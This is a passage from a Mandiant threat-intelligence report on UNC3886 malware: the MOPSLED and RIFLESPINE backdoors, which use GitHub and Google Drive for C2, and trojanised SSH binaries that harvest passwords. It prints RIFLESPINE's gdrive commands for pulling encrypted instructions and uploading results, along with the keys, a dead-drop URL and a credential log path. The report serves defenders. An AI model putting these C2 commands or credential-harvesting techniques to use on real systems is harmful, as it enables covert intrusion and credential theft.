The executables and the command constitute a component of the threat actor’s attempt to hijack SSH connections with the objective of acquiring SSH credentials. Analysis of the executables and their attempts is discussed later in this report.
Malware Leveraging Trusted Third Parties as C2 Channel
The threat actor was observed deploying malware, including MOPSLED and RIFLESPINE, that leverages trusted third parties like GitHub and Google Drive as C2 channels while relying on the rootkits for persistence.
MOPSLED
MOPSLED is a shellcode-based modular backdoor that has the capability to communicate over HTTP or a custom binary protocol over TCP to its C2 server. The core functionality of MOPSLED involves expanding its capabilities by retrieving plugins from the C2 server. MOPSLED also uses a custom ChaCha20 encryption algorithm to decrypt embedded and external configuration files.
Mandiant observed sharing of MOPSLED between other Chinese cyber espionage groups including APT41. Mandiant considered MOPSLED to be an evolution of CROSSWALK, which can act as a network proxy.
Mandiant observed UNC3886 deploy the Linux variant, identified as MOPSLED.LINUX, on vCenter servers and a small number of the compromised endpoints where REPTILE already existed. MOPSLED.LINUX appeared to be used only as an initial malware deployed after gaining successful access since the malware does not have rootkit-like capabilities that could evade detection.
MOPSLED.LINUX was developed to communicate with a dead-drop URL to retrieve an actual C2 address. The sample associated with UNC3886 was observed sending HTTP GET requests to https://cyberponke.github[.]io/*
. The response was decrypted using the ChaCha20 cipher to obtain the actual C2 IP address. Further communications are implemented as a custom binary protocol similar to HTTP/S.
RIFLESPINE
RIFLESPINE is a cross-platform backdoor that leverages Google Drive to transfer files and execute commands. It adopts the CryptoPP library to implement the AES algorithm to encrypt and decrypt the data transmitted between an affected machine and the threat actor.
To instruct RIFLESPINE, the threat actor creates an encrypted file on Google Drive with instructions for RIFLESPINE that is then executed by the malware on the target endpoint. The target endpoint’s MAC address must appear in the filename when it is created. The file is downloaded, RIFLESPINE downloads and decrypts the file, and executes the instructions. The executions’ outputs will be encrypted, stored in a temporary file, and then uploaded to Google Drive once more. The following instructions are available for execution:
- Download file with
get
command. - Upload file with
put
command. - Set next call out time in milliseconds with
settime.
- Execution arbitrary commands with
/bin/sh.
UNC3886 deployed RIFLESPINE with an open-source Google Drive CLI client. A systemd service file was created and used to execute the malware as the malware does not contain a persistence mechanism. Upon first installation, the malware collects system information and starts communicating with Google Drive service with the following steps:
- Execute
gdrive
to obtain the file pertinent to the target endpoint with the following command:gdrive --refresh-token <token> list | grep "2@<mac_address>"
- Write the filename to a temporary file
/tmp/syslog<random_number.rs.
- Download file to
/tmp
matching the filename with the following command:gdrive --refresh-token <token> download --path "/tmp" -f
- Decrypt file
/tmp/<filename>
to/tmp/<download_filename>.de
using CryptoPP AES-CBC with keylibcrypt.so.2
and IVlibev.so.5.
- Read
/tmp/<download_filename>.de
line by line for instructions to execute. - After executing the instructions, write output to
/tmp/update<random_number>.tmp.
- Encrypt response from
/tmp/update<random_number.tmp
to/tmp/update<random_number>.tmp.en
using the same AES keys as decryption. - Upload encrypted response with the following command:
gdrive --refresh-token <token> upload --name "/tmp /update<random_number>.tmp.en"
- Delay and repeat the previous steps.
Similar to MOPSLED.LINUX, RIFLESPINE was observed only in a small number of the compromised virtual machines. It is reasonable to assume that the threat actor abandoned the idea of using MOPSLED.LINUX and RIFLESPINE, which do not have rootkit functionality, as backdoors because predictable communications to GitHub and Google Drive services from virtual machine servers, rather than workstations, could raise suspicions.
Subverting Accesses With Backdoored Applications
Mandiant observed UNC3886 relying heavily on collecting and utilizing valid credentials for lateral movement between guest virtual machines running on the compromised VMware ESXi. The following section describes different techniques used by the threat actor to collect and abuse valid credentials.
Backdoored SSH Executables
After gaining access to the guest virtual machines, either through the collection of vpxuser
credentials or by exploiting CVE-2023-20867 in conjunction with VMware Guest Operations abuse to facilitate malicious file transfer and execution, UNC3886 was observed deploying backdoored SSH clients and daemons. The purpose of these malicious components was the interception and collection of credentials within an XOR-encrypted text file.
Analysis of the compromised SSH client located at /usr/bin/ssh
exposed modifications by the threat actor to the userauth_passwd()
function, which governs password-based authentication. These modifications (detailed in Figure 2) introduce instructions designed to harvest SSH credentials from outgoing connections. The credentials are then XORed with 0xef
before storage in the file /var/log/ldapd<unique_keyword>.2.gz
.
Source: https://cloud.google.com/blog/topics/threat-intelligence/uncovering-unc3886-espionage-operations/